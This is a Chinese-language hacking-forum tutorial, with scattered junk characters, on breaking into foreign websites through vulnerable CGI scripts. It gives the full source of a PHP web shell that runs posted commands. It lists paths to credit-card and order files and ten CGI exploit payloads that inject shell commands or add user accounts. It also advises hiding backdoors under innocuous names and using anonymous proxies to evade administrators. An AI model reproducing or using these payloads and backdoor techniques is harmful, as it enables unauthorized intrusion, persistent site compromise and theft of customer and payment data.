CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
9 x3 o' i- L+ O1 o大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
2 D" U. p- b# O1 o' j我会长长来玩的
; G' R2 w% Y; L6 c! c6 f前言:
以下讲解针对欧美日本网站
* w" ~; v. w$ V當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
0 G2 ~5 q( c* W9 S1 L2 Y( |2 j目录为/cgi-bin/
7 ?& v) \9 H6 c: W! \
* N. V: I$ a( {" W1 t只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
# A& N6 b, O9 H. A讲解一下
让没有基础的人很容易上手
( f; Q: v" u. W# h% H  w0 X; {
以下内容跟帖回复才能看到
; B9 O* f0 B, ~1 e==============================

9 L- O0 S" j/ A& i6 F* }+ w第1部份: 何谓Shell?
. r1 T+ g1 N. I* O; B  \1 x" B8 Q% F% sShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
, n1 ^$ c! ^0 R/ P; L6 S所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

% y% s# N0 S6 l第2部份: Unix 指令
以下是一些常见及重要的指令:
. w4 @+ U* C( P! k; X5 Zpwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
2 ]% n# S8 P; P+ Wls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
4 z7 b' n% `) l! c, P4 Y+ gls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
; {8 i3 l. p: K6 j0 `cat: 显示档案内容
0 x$ @# _  A( B) D  rcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
9 y9 {. s* g1 U; U: e( ?/ g" _( Zman: 显示指令用法  
man ls: 显示ls这指令的用法  
8 K: A5 Y- V! s3 L2 l$ p) J1 Q1 Gmkdir 建立目录
rmdir 删除目录
) T/ Q7 r3 o- Ymv 移动档案
, |0 o3 v0 P& X! @5 lrm 删除档案
; L4 r. W- ?# n; t+ L, ~
第3部份: Shell的使用
' [) A! v" j4 X例如:
/ ]* B( q  i; F+ U: shttp://site.com/refer.php
这是我的後门, 原代码如下:
+ l* V! M( N; y4 b* V<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
* v: k! d1 N. G$ `7 H</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
! W- `; q4 n6 U1 ^# w& gecho $Output;
! I# p* e( S& j( |* j0 s?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
1 V/ U& g. U9 s+ @, R7 @7 X1 t
第4部份: 注意事项
; X3 ]" ?/ f) ]- ?- 使用匿名代理, 保障自己
. K; \$ D' K( m! o/ O8 v- |1 k0 G/ i- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
. I7 f) U- J- v  p' D2 D. K针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
. j) s! p2 H4 r8 y2 c开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
, z: s: ]: x/ c2 x8 |# E2 t我们需要的东西有
扫洞工具 如:triton..等等
# }3 J: Y$ ?' w1 _* H- X8 Q* n$ K. y- CE表
如
& H' d( @* r1 a6 F& ~. }/cgi-bin/add-passwd.cgi
. F$ H: m8 m7 }$ @0 I/WebShop/templates/cc.txt
/ J' x& N7 q  n: Q/Admin_files/order.log
  x+ V% S5 m  H) h/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/ U* M9 r9 L& x# O4 P& w6 _/htbin/cart.pl
; C6 o7 Q7 Q, p' kE表来源可以是网路收寻或是自己的0 day
3 ]$ V# R% \4 r9 V
3 M4 Z& h+ d+ S2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
7 |) [) S2 N) \2 E$ N. y4 I一般都是在IE里先看一下的,记住这个返回码哦
: q$ `7 k$ y) m1 F$ K9 Y( v6 f# \ERROR:This script should be referenced with a METHOD of POST.
/ }1 a4 N8 y4 ]. z9 h3 p" W没有返回一定是假的
/ {9 E6 N' @, K% z# g' ]2 X/ u, y6 S3.重来来了 很多人都会问我
1 y1 `6 ?/ M- n0 Q+ G* C" }他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

) B" K6 k& G5 M以下我提供10个 cgi 洞以及使用方法post
) o+ X' i& ]; ?# V; M( i让大家可以针对网站去做扫描  
) J. p* o+ u( b5 a) q( I: Y9 U/index.cgi
- B# ~1 M3 q% W9 [. ?wei=ren&gen=command
# v6 ~" \/ I' [/ F! b. [/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
. K5 C% F4 P6 ^8 w5 t$ t' o; Ousername=username&password=password&ref1=|echo;ls|
4 ?; m* L( F* L: t/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
; O  D2 l8 K" p1 ?! l6 b/addusr.pl
4 w2 }  u! N6 n6 k6 L8 o/cgi-bin/EuroDebit/addusr.pl
2 ~; U. u! m* k7 h5 Wuser=username&pass=Password&confirm=Password
$ S8 \7 @3 h4 I  U5 F7 U5 G. i/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
9 `) m1 G* g- k: b4 }- @$ a/recon.cgi
, A1 {. ?5 x( u; j6 }/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
6 Y6 i9 X/ ?$ s( kvercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持
+ V' d8 Z6 s( X) n* w  y% }